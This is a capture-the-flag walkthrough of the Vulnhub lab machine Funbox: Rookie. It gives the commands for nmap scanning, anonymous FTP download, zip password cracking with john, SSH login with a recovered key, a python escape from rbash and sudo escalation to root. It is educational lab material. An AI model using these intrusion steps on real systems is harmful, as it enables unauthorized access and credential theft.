Funbox Rookie Vulnhub Walkthrough

Hello, Friends Welcome to Another Vulnhub Machine Walkthrough is name Funbox: Rookie. This Easy level box. and This VM makes for Testing Penetration Tester Skill and this machine is hosted on Vulnhub Server you can download here this machine.

Network scanning

Let’s Star with network Scanning find our target IP address using the Nmap ping scan command.

nmap -sn 192.168.43.1/24
Funbox Rookie Vulnhub Walkthrough

Nmap is discovered our target IP address. In my case, my target IP address is ( 192.168.43.88) and our next step is scanning target machine ports and running services.

sudo nmap -A 192.168.43.88

and Nmap Scanning output is shown open ports target machine and we can see FTP service allows anonymous user login and there have lots of zip files.

Enumeration

We started Enumeration on port 21/FTP by using the URL we can login we anonymous FTP user and we download the every one file our local machine.

ftp://192.168.43.88
Funbox Rookie Vulnhub Walkthrough

Password Cracking

After download all zip files First we generate hash all files by using the zip2john tool. and we crack only two zip file cathrine.zip and tom.zip. let’s extract the zip file data After extract the file we found a private SSH key

zip2john tom.zip > tom.hash
rockyou=/usr/share/wordlists/rockyou.txt
john --wordlist=$rockyou tom.hash
unzip tom.zip
Funbox Rookie Vulnhub Walkthrough

Now we have ssh private. first, we changed the private key permission and then try to login with the tom user SSH server.

chmod 600 id_rsa
ssh -i id_rsa [email protected]

After getting a shell target machine we enumerating the machine but our some command is not working and we can see our shell environment is rbash means ( restrict bash shell ) there have lots of option bypassing this shell but we’re using the python command for bypass rbash the shell.

read more about rbash shell cheat sheet

id echo $SHELL
cd /home
python3 -c 'import os; os.system("/bin/bash");'
ls -lsa
Funbox Rookie Vulnhub Walkthrough

After reading the .mysql_history we found a possible password for tom user and the sudo -l command is shown our user can run any command with a password. let’s run the sudo su command for getting root account access.

cat .mysql_history
sudo -l
sudo su
Funbox Rookie Vulnhub Walkthrough

let’s move the /root directory and read the root flag.

cd /root
ls
cat flag.txt
Funbox Rookie Vulnhub Walkthrough

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →